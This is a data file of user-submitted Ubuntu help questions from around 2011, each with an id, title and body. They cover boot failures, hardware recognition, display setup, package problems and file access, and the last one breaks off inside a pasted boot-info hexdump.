60389	avahi error on startup	each time i start up , i get a blue popup-like blue window with an exclamation mark giving me what looks like an error message . it does not stay long enough for me to write it down . it says something like : avahi does not support `` .local '' .. something about network ? but a lot more text ... i deduced the name `` avahi '' from trying tab-completion in a terminal . ; ) it has something to do with some network or other . i have cable internet , and also a wireless network adapter that is switched off . is this something to be concerned about ? i am running an 11.04 ubuntu inside a winxp , on a usb-drive .
60390	how to setup a cloud with a bunch of computers running ubuntu server ?	how to setup a cloud with a bunch of computer running ubuntu server connected in a lan.. is it possible to access the cloud outside the lan through internet.. ?
60399	how can i download and install saslauthd ?	i can not find saslauthd on my ubuntu 11.04 , and i did not find any package to install it . how to install , which package contains it ?
60401	batch processing tif images ? converting .tif to .jpeg	i 'm trying to mass convert a handful of .tif files . i found phatch could look like a good candidiate but i 'm running ubuntu 11.04 . looks like they do n't have a .deb for my version . anyone have any alternatives to phatch or any other recommendations as to quickly batch convert tif to jpeg files . i 'm looking for a non-photoshop ( ala wine ) solution .
60403	how do i use ultravnc ?	i 'd like to be able to upload files like a windows version of vnc 's . how can i upload files using vnc ? i have tried tigervnc , default vnc , but with none can i do that .
60404	how do i author adobe flash movies ?	is there a decent gui for building flash movies in ubuntu ? an easy-to-use api would be fine , too . i did find ming ( api for creating .swf files ) and am going to check that out .
60405	can i install rtlinux ?	how do i install rtlinux in ubuntu ? if i get it to install will it make software work abnormally ?
60406	how can i do chkconfig like in fedora ?	in fedora i can do $ chkconfig -- list | grep ssh note : this output shows sysv services only and does not include native systemd services . sysv configuration data might be overridden by native systemd configuration . sshd 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off and it shows all run levels . then i can use chkconfig sshd on or chkconfig sshd off how can i do the same in my ubuntu 11.04 ? + how do i mention in which runlevel it should start ?
60409	how to make the window manager to show the x - [ ] not on left top corner but bottom left or bottom right corner ?	ubuntu 11.04 , how can i change the windows close/minimize/maximize buttons on top left corner to somewhere else like : bottom left corner , bottom right corner ? if it 's not possible , then i would like to put top right corner . example as following window : + -- -- -- -- -- -- -- -- + - [ ] -- + | | | hello world | | ubuntu 11.04 | | hero is here | | | + -- -- -- -- -- -- -- -- -- -- -- -- -- + i have tried command lines from these questions : how do i move the window buttons from left to right ? can the window controls ( max , min , close ) and the title be moved to the bottom ? but none was working with ubuntu 11.04 , the only one worked was ( ubuntu tweak ) , but in that case i do not have the terminal/command line to make my own custom script for future use .
60416	unlock mac time machine hdd in ubuntu	i recently migrated from snow leopard to ubuntu , but i forgot to make a backup of some of the info in my old mac . i have my time machine prepared hdd , but when i connect the drive to ubuntu it tells me i do not have permission to see the content of the folders , any ideas to open the drive and extract the info ?
60421	how can i start my screen in rotate mode 90/-90 or 180/-180 or 45/-45 angle ?	when i start my ubuntu its connected to my monitor . how can i always default start in rotate mode ? ( not the default one that we use daily ) . i was trying to make it -90 or -180 or -45 but cant make it yet .
60426	why does my screen go gray ?	i just installed ubuntu 11.04 on my laptop . however , very often things get very slow and windows start blinking with gray color . the system is then almost unresponsive ... this goes on and off in about 5 minutes interval . when i run the top command it looks like the xorg command is using most of the cpu when things get crazy . i am using hp compaq 6720s.. lspci | grep vga returns 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) come more specs of 6720s : processor : intel core 2 duo processor t5470 1.60ghz , 2mb l2 cache , 800mhz fsb os : microsoft windows vista home basic hard drive : 120gb sata ( 5400rpm ) , hp driveguard screen : 15.4 '' wxga brightview widescreen ( 1280 x 800 ) graphics : intel graphics media accelerator x3100 ram : 1 x 1024mb ddr2 some other information : 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) 00:19.0 ethernet controller : intel corporation 82562gt 10/100 network connection ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f3 ) 00:1f.0 isa bridge : intel corporation 82801hem ( ich8m ) lpc interface controller ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) ide controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) sata ahci controller ( rev 03 ) 10:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 )
60429	can i manage to install on a dell 15r with all my laptop 's features ?	i have a dell n5010 15r with a 64-bit i3 processor , intel hd graphics , 320gb hard drive and integrated network card . i wanted to know which ubuntu version to install in order to have the capacity to use the hd integrated graphics card 's full potential . i want to get in ubuntu and stop using windows 7 , but will it run programs like fl studio or vegas studio pro or similar ?
60431	how do i resize root partition ?	i have a dual boot setup with ubuntu and windows 7 . i need to shrink my root ubuntu volume in order to get some free space to create a new partition . are there any windows based tools that will do this for me ? i tried booting up in gparted to do this but i can not tell which partition is which since i can not find the size ( it displays everything in blocks ) .
60435	`` sticky key '' -like bug , keypress/release events repeat indefinitely	i have had this bug for a long a time and have been unable to research a solution . if not a solution , some ideas of what other methods i could take to determine the exact cause would be helpful . laptop : dell lat 6520 running ubuntu 10.10 , gnome 2.32.0 the bug : every so often while i 'm typing , a key will just keep `` pressing '' itself indefinitely . my keyboard is not dirty ; the key is not physically stuck , this bug presented itself in the first week of use of this laptop . it can happen to any key , even the shift key ( `` enter '' and arrow keys are especially annoying ) , and in any application , implying to me it may be hardware related . the rest of the keyboard is unresponsive ; if i switch to another application , it continues there as well . i have still have use of my external mouse , and have found that i can put the box into suspend , and restore it a few seconds later , it is gone . however , after restoring from suspend , i always notice the first time i press the key that was stuck , it doesnt register ; example : my password contains a letter `` v '' . if `` v '' was the stuck letter , i have to press `` v '' twice to get it register the first time while logging in , then it works fine afterwards . so today , i attached xev to my geany application since thats where i work most of my time and waited for it to happen as it always does . the lucky key this time was `` = '' . here is a snippet of the xev log file : http : //pastebin.com/ps8rdxgr you can imagine how annoying this random crap is . any clues or helpful suggestions are greatly appreciated . if you know if any other logs you 'd like to see from that time , or something else you think i should run while waiting for it to happen again , i gladly will . here are some things i 've tried : still searching around other issues that sound somewhat similar , i read several suggestions that setting the boot option acpi=off will solve many kinds of input related issues or crashes . setting acpi=off ^ did not work . the bug still exists . i installed xdotool which allows you send key events to x or a specific window , wrote a script to send a keyup event for every key i can possibly type on this laptop keyboard , and put it on my toolbar . so hopefully next time it happens , i can click to run it and it will catch a keyup event for whatever key is stuck that time . i am hopeful , because i noticed after playing with xdotool , that it reproduces the same effect the bug does after i suspend - the key doesnt register the first time you press it . if i use 'xdotool keydown x ' , it just sends 'x ' like youre typing it , but after you kill it , the first time you press 'x ' , it doesnt register , just like my bug . xdotool worked , somewhat . it stopped the constant keydown events ( on the 'e ' key this time ) , but afterwards the keyboard was unresponsive , just like when the keydown events were happening . i also have scripts to disable and re-enable the keyboard with xinput , which i tried , but they did nothing . i had to suspend my laptop and log in again to get the keyboard back .
60438	boot mounts failing after power outage	update 1 output of sudo fdisk -l ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00050e46 device boot start end blocks id system /dev/sda1 * 1 9729 78140139 7 hpfs/ntfs /dev/sda2 9729 14594 39079937 5 extended /dev/sda5 9729 14388 37430272 83 linux /dev/sda6 14389 14594 1648640 82 linux swap / solaris ubuntu @ ubuntu : ~ $ original question i 'm getting the following message when i try to boot up my ubuntu 10.04 install : mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have /sbin/init . no init found . try passing init= bootarg this happened after a power failure . i am currently using the same computer but booted from the ubuntu 10.04 livecd . how do i recover my system ?
60439	`` can not display this video mode '' error during boot , followed by empty desktop	on my computer , i replaced windows xp with ubuntu 11.04 . when i start up my computer , i get the message 'can not display this video mode - optimal resolution 1280 60hz ' , in a black screen . after a few minutes , i can login . after this , there appears a colored screen with only a mouse cursus , and i ca n't do any more ! how can i solve this problem ?
60443	where can i find documentation for notify-osd ?	whenever something happen which require notification ( connecting to a wireless network or low battery status ) ubuntu ( unity ) gives a nice floating message which ( usually ) vanishes after several seconds . is there a way to produce my own floating notification ?
60444	set default config files directory	can i set default config dir in home folder ? i dislike : /home/user/documents /home/user/music /home/user/.progconf1 /home/user/.progconf2 i want : /home/user/documents /home/user/music /home/user/.config/.progconf1 /home/user/.config/.progconf2
60448	gimp package dependencies can not be resolved	i need a little help from some friends . i installed gimp-2.7 via ppa when i already had gimp-2.6 installed via software center , and then i wanted to use 2.6 again . i am using ubuntu 11.04 . i removed the ppa for 2.7 let software centre update , closed and even logged out and then back in . but 2.7 was still there . so i figured i would remove it all and just re-install . i did : sudo apt-get remove -- purge gimp and then tried installing gimp via software centre but only to have this error : i looked in my home directory and .gimp-2.6 & .gimp-2.7 are still there . i thought remove & purge namely purge would completely remove them from my computer . how can i resolve the package dependencies and have gimp-2.6 installed again . thank you very much for your time and answers .
60457	should i download the iso image again for the latest version ?	here is the thing . i got new ssd and want to run clean install of ubuntu 11.04 on it . i have install usb which i made right after 11.04 was released . and my question is - should i now download again iso image to avoid lots of updates or this is the same version as it was before an i will have to update anyway ?
60466	where is my encrypted home folder ?	i 'm following these instructions for 11.04 to decrypt my /home/torben folder of my old drive so that i can copy it onto my new drive . it seems to succeed : info : success ! private data mounted read-only at [ /tmp/ecryptfs.xtltx0tt/private ] . but i ca n't find the decrypted files in the /tmp/ ... location given in the command 's output . where are the files ?
60467	alternatives to dvd-slideshow	i 'm currently using dvd-slideshow to create video files containing slideshows with sound , transitions and titles , and i 'm quite fond of the command line approach for this kind of task . is there any good alternatives to dvd-slideshow for this kind of task , if so which ? or should i stick with dvd-slideshow ? as mentioned i appreciate using the command line for this kind of task but it 's not a necessary â i 'd be happy with a good gui too . also , i 'd appreciate further options and customizability than what dvd-slideshow allows for . finally , i 'd appreciate answers with arguments for a certain application or comparisons between certain applications .
60469	error message when running `` make '' command : /usr/bin/ld : i386 architecture of input file is incompatible with i386 : x86-64 output	i am unable to create a working executable file by running the make command in a tree previously built on an i386 machine . i 'm getting an error message in the form of me @ me-desktop : ~ $ make /usr/bin/ld : i386 architecture of input file `../.. /lib/libprogram.a ( something.o ) ' is incompatible with i386 : x86-64 output i 've been told and reassured that this program has been tested and successfully compiled on 64-bit fedora . i 'm running a 64-bit machine me @ me-desktop : ~ $ uname -m x86_64 i 'm running ubuntu 10.04 me @ me-desktop : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.3 lts release : 10.04 codename : lucid i 'm using g++ # me @ me-desktop : ~ $ g++ -- version g++ ( ubuntu 4.4.3-4ubuntu5 ) 4.4.3 copyright ( c ) 2009 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . i 'm also using libtool # me @ me-desktop : ~ $ libtool -- version ltmain.sh ( gnu libtool ) 2.2.6b written by gordon matzigkeit < gord @ gnu.ai.mit.edu > , 1996 any clues as to what is going wrong ?
60471	what 's a good fullscreen launcher for the gnome2 desktop ?	i like elementary ' s slingshot , but as you can see from this screenshot , it does n't correctly show all of my applications ( you can see synaptic on the unity launcher but not in slingshot ; generally all the apps in the administration and preferences menus are not featured ) . i tried lxlauncher in the past but i would like something that can be summoned with a hotkey . i know kde has options under the form of widgets , but i 'm a gnome guy . thanks for your suggestions !
60472	getting root access to a hard drive connected via usb ?	friend 's old laptop running ubuntu has 'died ' ( too old to be worth repairing ) , but he wanted to save some family photos from the hard drive , so i took the drive out and connected it to my laptop ( running ubuntu 11.04 ) with an ide-to-usb adapter . how do i get permissions to access all the files on the filesystem ? i tried with sudo chown -r username /dev/devicename , sudo chmod -r 755 /dev/devicename , but it does n't work . i also tried booting the whole system from the usb-connected drive , but it does n't seem to work either . there seems to be nothing inside the /home folder . is this because i do n't have permissions to view the content , or does this mean that the hard drive is corrupt/there 's nothing there and all my effort is in vain anyway ?
60474	how do i set up a headless server via vnc ?	i 'm trying to configure my system to run headless and access the desktop via vnc when necessary . it seems everytime i unplug the monitor while ubuntu is running , the system freezes and i am forced to do a hard shut down . if i start the computer up without a monitor it wo n't boot up all the way and i am still unable to access the desktop through vnc . i am able to vnc to it while there is a monitor attached to it . automatic login is enabled . i want to vnc into my ubuntu machine without a monitor .
60478	sony ericsson se z800 not recognized on a server	i 've 2 ubuntu 10.04 lts servers . when i plug a sony ericsson z800 on into server2 , dmesg only shows that it 's a usb device and nothing else . [ 55.028092 ] usb 5-2 : new full speed usb device using uhci_hcd and address 3 [ 55.222181 ] usb 5-2 : configuration # 3 chosen from 1 choice on the server1 , it 's recognised fully . [ 363424.988409 ] usb 5-1 : new full speed usb device using ohci_hcd and address 4 [ 363425.164831 ] usb 5-1 : configuration # 1 chosen from 1 choice [ 363425.172353 ] cdc_acm 5-1:1.1 : ttyacm0 : usb acm device [ 363425.180285 ] cdc_acm 5-1:1.3 : ttyacm1 : usb acm device [ 363425.191774 ] cdc_wdm 5-1:1.7 : cdc-wdm0 : usb wdm device [ 363425.198568 ] scsi7 : scsi emulation for usb mass storage devices [ 363425.198653 ] usb-storage : device found at 4 [ 363425.198654 ] usb-storage : waiting for device to settle before scanning [ 363430.197578 ] usb-storage : device scan complete [ 363430.203527 ] scsi 7:0:0:0 : direct-access sony eri memory stick 0000 pq : 0 ansi : 0 [ 363430.205355 ] sd 7:0:0:0 : attached scsi generic sg3 type 0 [ 363430.224490 ] sd 7:0:0:0 : [ sdc ] 63424 512-byte logical blocks : ( 32.4 mb/30.9 mib ) [ 363430.234504 ] sd 7:0:0:0 : [ sdc ] write protect is off [ 363430.234514 ] sd 7:0:0:0 : [ sdc ] mode sense : 00 6a 00 00 [ 363430.234521 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through [ 363430.265517 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through [ 363430.269159 ] sdc : sdc1 [ 363430.357502 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through [ 363430.361111 ] sd 7:0:0:0 : [ sdc ] attached scsi removable disk somethings up with server2 - is there anything i can do / check ? /dev/ttyacm n is not being created and i know it 's not the phone . any ideas anyone ? usb keyboards etc . work fine on server2 . i want to use this with gammu to make an sms server ( works fine on server1 ) .
60481	how do i resize the desktop on my second monitor ?	i got two screens ( extended desktop ) and the second is widescreen standing on its side , so i told ubuntu that its vertical , it works fine , but the wallpaper area of the first horizontal smaller one , goes all the way down to the size of the vertical one . the problem is the icons on my desktop get in the hidden area , when they are created and i have to be constantly moving them to see them . oddly enough this does not happen in xfce only in the gnome desktop . i thought it was nautilus fault so i tried pcmanfm to render my desktop/wallpaper , same issue . it 's a gnome thing . how can i make it so the geometry is not a big square but 2 rectangles on my desktop the left part is the small widescreen monitor , the right is the widescreen vertically placed . and i can move my mouse on the left way below the visible part , and the desktop icons are going down there too i have to reposition them manually . . xrandr -- current outputs this : screen 0 : minimum 320 x 200 , current 2180 x 1440 , maximum 2806 x 2806 lvds connected 1280x768+0+0 ( normal left inverted right x axis y axis ) 353mm x 199mm 1280x768 60.0*+ 1366x768 60.0 + 1360x768 60.0 1280x720 60.0 1024x768 60.0 1024x600 60.0 800x600 60.0 800x480 60.0 640x480 60.0 dfp1 disconnected ( normal left inverted right x axis y axis ) crt1 connected 900x1440+1280+0 right ( normal left inverted right x axis y axis ) 410mm x 257mm 1440x900 59.9*+ 1280x1024 75.0 60.0 1280x960 60.0 1280x800 60.0 1152x864 75.0 59.9 1280x768 60.0 1280x720 60.0 1024x768 75.0 70.1 60.0 1024x600 75.0 70.1 60.0 800x600 72.2 75.0 60.3 56.2 800x480 72.2 75.0 60.3 56.2 640x480 75.0 72.8 67.0 59.9 i ' pretty sure dfp1 is my hdmi output , i ' , not using that one .
60483	ctrl click no longer works in firefox	a few days ago , about when firefox was updated to 3.6.21 , ctrl+click stopped opening links in a new tab . how do i restore this functionality ?
60484	why do synaptic and update manager not use overlay scrollbars ?	this happens in both 11.04 and 11.0 . i read in some place that this apps are “blacklisted” to explicitly not use overlay scrollbars , but why ? edit ( 17 sep ) : now update manager has been whitelisted and it uses overlay scrollbars ( see this revision ) . synaptic still is blacklisted .
60485	what gaming keyboard ( s ) will work with ubuntu ?	i 've been looking at gaming keyboards to use on ubuntu system . microsoft has a few popular ones ( e.g. , sidewinder x4 , x6 ) , but the programmable function keys appear to be unusable without the windows software . ( though here 's a post from someone who has a more recent project that uses usbmon and xdotool to add functions to some keys . ) another choice in my budget is the cyborg v.05 . it seems about right for my needs , but i would be depressed having a bunch of useless , nonprogrammable keys on it . logitech has some models ( e.g. , the logitech g110 ) , though again i expect that the extensive macro capabilities ( which i do n't need ) would be lost under linux . there 's a project called g15tools which has some code to work with older logitech gaming models , but i do n't know what the current status is . last entry there was in march 2010 . there are also a number of very old posts around the internet with regard to the logitech g11 and g15 . compatibility with the current keyboards , ubuntu version , and linux kernel are suspect . i 'm in the u.s. , and so it appears that few of the roccat keyboards are available , and they 're over-priced . support might be ok for these , though -- there 's a short phoronix article about roccat improving their linux support , and there 's also a project and webpage for `` using roccat hardware with linux '' . honestly , the only feature i have to have is good backlighting for the keys , and if it 's not wired ( which is fine ) , the wireless capability should function . i could probably live with dead function keys , as long as they were n't in places that would interfere with things like unity/compiz shortcuts . any experience or suggestions ? i 've not seen much to inspire confidence with programmable/macro keys . there is a thread ( with no solutions ) on the sidewinder x4 on ubuntuforums here . i 'm also considering the logitech illuminated keyboard as a possibility , even though it 's not specifically a gaming keyboard . it is backlit , and it 's supposed to be a nice keyboard .
60488	unable to suspend - power manager vanished	recently , after a few upgrades , i find that the power-management applet indicator has vanished , and the option of suspend has suddenly changed to power-off . i can still suspend through sudo pm-suspend , but pressing on the power button blanks and locks the screen at best . moreover , the options of power button and close lid are no longer visible in power options menu .
60491	why it is over half slower to cp a file instead of using nautilus 's gui copy ? ( afc protocol )	i have an jailbroken ipod touch , and i have the afc2add package . when i plug it into my ubuntu laptop , it automounts my ipod 's media directory , as well as the app file sharing folders too . when i use nautilus to transfer a file into the media folder , it peaks at about 5mb/s . however , when i use a terminal to copy a file to the ~/.gvfs/matt 's ipod folder [ in nautilus , it shows up as `` matt 's ipod '' ] , i have only seen it go up to about 2mb/s . can anyone give any clues as to why it is over half slower to cp a file instead of using nautilus 's gui copy ? by the way , the i can tell how fast it is going with a terminal copy , i have a script with pv [ in a nutshell , it is : pv $ 1 > $ 2 ] , and that was going about 1.5mb/s . so i also tried cp , and set up a loop to du the file every second , and it jumped up somewhere near 2 mb every second .
60497	irw is n't picking up all of my remotes keypresses	i have a harmony 650 remote i am using for xbmc . i have it set up as a mce remote in lirc using an hp ir usb receiver . when i run irw , not all of the keypresses are being picked up . i can see the red light flashing on the receiver , but nothing in irw . the only keys it is picking up are channel up , channel down , ok , 1 , 2 , and 3 . i was considering using irrecord to create a custom lirc.conf file for the remote , but wanted to check if anyone had any ideas first .
60501	no root file system is defined error after installation	i installed ubuntu through wubi and once i rebooted i get no root file system defined error . here 's the output of the boot_info_script.could anyone point me out where the error is . boot info script 0.60 from 17 may 2011 ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > windows is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe /ntldr /ntdetect.com /wubildr /ubuntu/winboot/wubildr /wubildr.mbr /ubuntu/winboot/wubildr.mbr /ubuntu/disks/root.disk /ubuntu/disks/swap.disk sda1/wubi : _____________________________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' sda2 : __________________________________________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . operating system : boot files : /boot.ini /ntldr /ntdetect.com sdb1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 160.0 gb , 160041885696 bytes 240 heads , 63 sectors/track , 20673 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 63 301,250,879 301,250,817 7 ntfs / exfat / hpfs /dev/sda2 301,250,943 312,575,759 11,324,817 c w95 fat32 ( lba ) guid partition table detected , but does not seem to be used . partition start sector end sector # of sectors system /dev/sda1 323,465,741,313,502,988275,962,973,585-323,465,465,350,529,402 - /dev/sda2 242,728,591,638,290,720578,721,383,108,845,578335,992,791,470,554,859 - /dev/sda3 1,827,498,311,425,204,2562,091,935,274,843,009,907264,436,963,417,805,652 - /dev/sda4 579,711,218,081,401,3572,006,665,459,744,645,1521,426,954,241,663,243,796 - /dev/sda11 270,286,346,402,038,1183,786,543,326,404,525,9543,516,256,980,002,487,837 - /dev/sda12 4,179,681,002,230,769,6684,179,389,374,010,033,387-291,628,220,736,280 - /dev/sda13 232,556,480,979,456,1311,160,152,593,793,119,235927,596,112,813,663,105 - /dev/sda14 98,342,784,050,266,9183,691,264,578,843,725,1953,592,921,794,793,458,278 - /dev/sda15 2,307,845,219,957,882,4961,850,841,032,955,276,350-457,004,187,002,606,145 - /dev/sda16 512,592,046,878,946,497368,458,231,024,779,444-144,133,815,854,167,052 - /dev/sda17 2,504,135,232,870,384,3923,665,087,872,719,320,8291,160,952,639,848,936,438 - /dev/sda18 3,783,181,605,270,691,304122,034,509,624,708,942-3,661,147,095,645,982,361 - /dev/sda19 3,519,661,520,275,829,5122,376,243,094,723,723,587-1,143,418,425,552,105,924 - /dev/sda20 3,867,920,076,859,0744,494,691,111,933,625,1044,490,823,191,856,766,031 - /dev/sda21 1,500,144,061,909,253,7612,511,182,033,846,676,3401,011,037,971,937,422,580 - /dev/sda22 13,035,625,499,900,0062,360,168,613,941,394,9472,347,132,988,441,494,942 - /dev/sda23 4,228,978,682,068,599,48813,159,423,631,648,263-4,215,819,258,436,951,224 - /dev/sda24 3,695,955,742,872,046,9084,561,928,726,501,845,776865,972,983,629,798,869 - /dev/sda25 1,297,460,286,683,948,0461,444,350,486,339,417,957146,890,199,655,469,912 - /dev/sda26 1,228,858,248,533,131,831 0-1,228,858,248,533,131,830 - /dev/sda121 3,189,184,846,146,487,1461,849,820,258,006,914,852-1,339,364,588,139,572,293 - /dev/sda122 1,226,215,547,991,800,578389,781,518,734,546,300-836,434,029,257,254,277 - /dev/sda123 3,851,660,168,574,583,4654,046,215,657,583,031,556194,555,489,008,448,092 - /dev/sda124 1,197,460,980,174,153,341699,103,965,005,093,246-498,357,015,169,060,094 - drive : sdb _____________________________________________________________________ disk /dev/sdb : 750.2 gb , 750153367552 bytes 255 heads , 63 sectors/track , 91200 cylinders , total 1465143296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 2,048 1,465,143,295 1,465,141,248 7 ntfs / exfat / hpfs '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 iso9660 ubuntu 11.04 amd64 /dev/loop1 squashfs /dev/sda1 e814b55b14b52e06 ntfs /dev/sda2 01cd-023b vfat hp_recovery /dev/sdb1 7836f22a36f1e8d0 ntfs elements ================================ mount points : ================================= device mount_point type options /dev/loop0 /cdrom iso9660 ( ro , noatime ) /dev/loop1 /rofs squashfs ( ro , noatime ) /dev/sdb1 /mnt fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) ================================ sda2/boot.ini : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ boot loader ] timeout=0 default=c : \cmdcons\bootsect.dat [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows= '' microsoft windows xp professional '' /fastdetect c : \cmdcons\bootsect.dat= '' microsoft windows recovery console '' /cmdcons -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ======================== unknown mbrs/boot sectors/etc : ======================== unknown gpt partiton type c104043000e9b9040dff24b580010100 unknown gpt partiton type 46313020746f20737461727420746865 unknown gpt partiton type 65727920706172746974696f6e207761 unknown gpt partiton type 727920706172746974696f6e0d0a0000 unknown gpt partiton type 000f84e5f7668b162404e82804744066 unknown gpt partiton type ce01e8dc038bfe66391624047505e8d9 unknown gpt partiton type 0345086603f0e881030bd2740333d240 unknown gpt partiton type bece01e8db0287fec645041266895508 unknown gpt partiton type 01f60634010175078b363b01e854f5e8 unknown gpt partiton type 313825740ffec03865107408fec03824 unknown gpt partiton type 02f60634014074088bfdbece01e85101 unknown gpt partiton type 263401f9e894f30f858ef4e8e201e8ec unknown gpt partiton type f7e960f35245434f5645525966606633 unknown gpt partiton type 660faf1e00106603dac3668b0e001066 unknown gpt partiton type 8bfd386d04740583c710e2f6c36660c6 unknown gpt partiton type 04ebf132c0b91000f3aac3bf0c04ebf3 unknown gpt partiton type 02662bc1660fb71e0e02662bc366031e unknown gpt partiton type f4b40ebb0700b901003c08751381ff25 unknown gpt partiton type 534f465448494e4b90653f62011b0100 unknown gpt partiton type 0b050900027777772e68702e636f6d00 unknown gpt partiton type d441a0f5030003000ecb744a08bb3746 unknown gpt partiton type f8579a116b4a7aa931cde97a4b9b5c09 unknown gpt partiton type 7229990415b77c0a1970e7e824237a3a unknown gpt partiton type afb6e34d6b4bd8c7c0eada19a9786cc3 unknown bootloader on sda1/wubi 00000000 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| * 00000200 unknown bootloader on sda2 00000000 e9 a7 00 52 45 43 4f 56 45 52 59 00 02 08 20 00 | ... recovery ... .| 00000010 02 00 00 00 00 f8 00 00 3f 00 f0 00 7f b9 f4 11 | ... ... .. ? ... ... .| 00000020 8c cd ac 00 1e 2b 00 00 00 00 00 00 02 00 00 00 | ... ..+ ... ... ... .| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 80 00 29 3b 02 cd 01 20 20 20 20 20 20 20 20 20 |.. ) ; ... | 00000050 20 20 46 41 54 33 32 20 20 20 8b d0 c1 e2 02 80 | fat32 ... ... | 00000060 e6 01 66 c1 e8 07 66 3b 46 f8 74 2a 66 89 46 f8 |..f ... f ; f.t*f.f.| 00000070 66 03 46 f4 66 0f b6 5e 28 80 e3 0f 74 0f 3a 5e |f.f.f..^ ( ... t. : ^| 00000080 10 0f 83 90 00 66 0f af 5e 24 66 03 c3 bb e0 07 | ... ..f..^ $ f ... ..| 00000090 b9 01 00 e8 cf 00 8b da 66 8b 87 00 7e 66 25 ff | ... ... ..f ... ~f % .| 000000a0 ff ff 0f 66 3d f8 ff ff 0f c3 33 c9 8e d9 8e c1 | ... f= ... ..3 ... ..| 000000b0 8e d1 66 bc f4 7b 00 00 bd 00 7c 66 0f b6 46 10 |..f.. { ... .|f..f.| 000000c0 66 f7 66 24 66 0f b7 56 0e 66 03 56 1c 66 89 56 |f.f $ f..v.f.v.f.v| 000000d0 f4 66 03 c2 66 89 46 fc 66 c7 46 f8 ff ff ff ff |.f..f.f.f.f ... ..| 000000e0 66 8b 46 2c 66 50 e8 af 00 bb 70 00 b9 01 00 e8 |f.f , fp ... .p ... ..| 000000f0 73 00 bf 00 07 b1 0b be a9 7d f3 a6 74 2a 03 f9 |s ... ... .. } ..t*..| 00000100 83 c7 15 81 ff 00 09 72 ec 66 40 4a 75 db 66 58 | ... ... .r.f @ ju.fx| 00000110 e8 47 ff 72 cf be b4 7d ac 84 c0 74 09 b4 0e bb |.g.r ... } ... t ... .| 00000120 07 00 cd 10 eb f2 cd 19 66 58 ff 75 09 ff 75 0f | ... ... ..fx.u..u.| 00000130 66 58 bb 00 20 66 83 f8 02 72 da 66 3d f8 ff ff |fx.. f ... r.f= ... | 00000140 0f 73 d2 66 50 e8 50 00 0f b6 4e 0d e8 16 00 c1 |.s.fp.p ... n ... ..| 00000150 e1 05 03 d9 66 58 53 e8 00 ff 5b 72 d8 8a 56 40 | ... .fxs ... [ r..v @ | 00000160 ea 00 00 00 20 66 60 66 6a 00 66 50 53 6a 00 66 | ... . f`fj.fpsj.f| 00000170 68 10 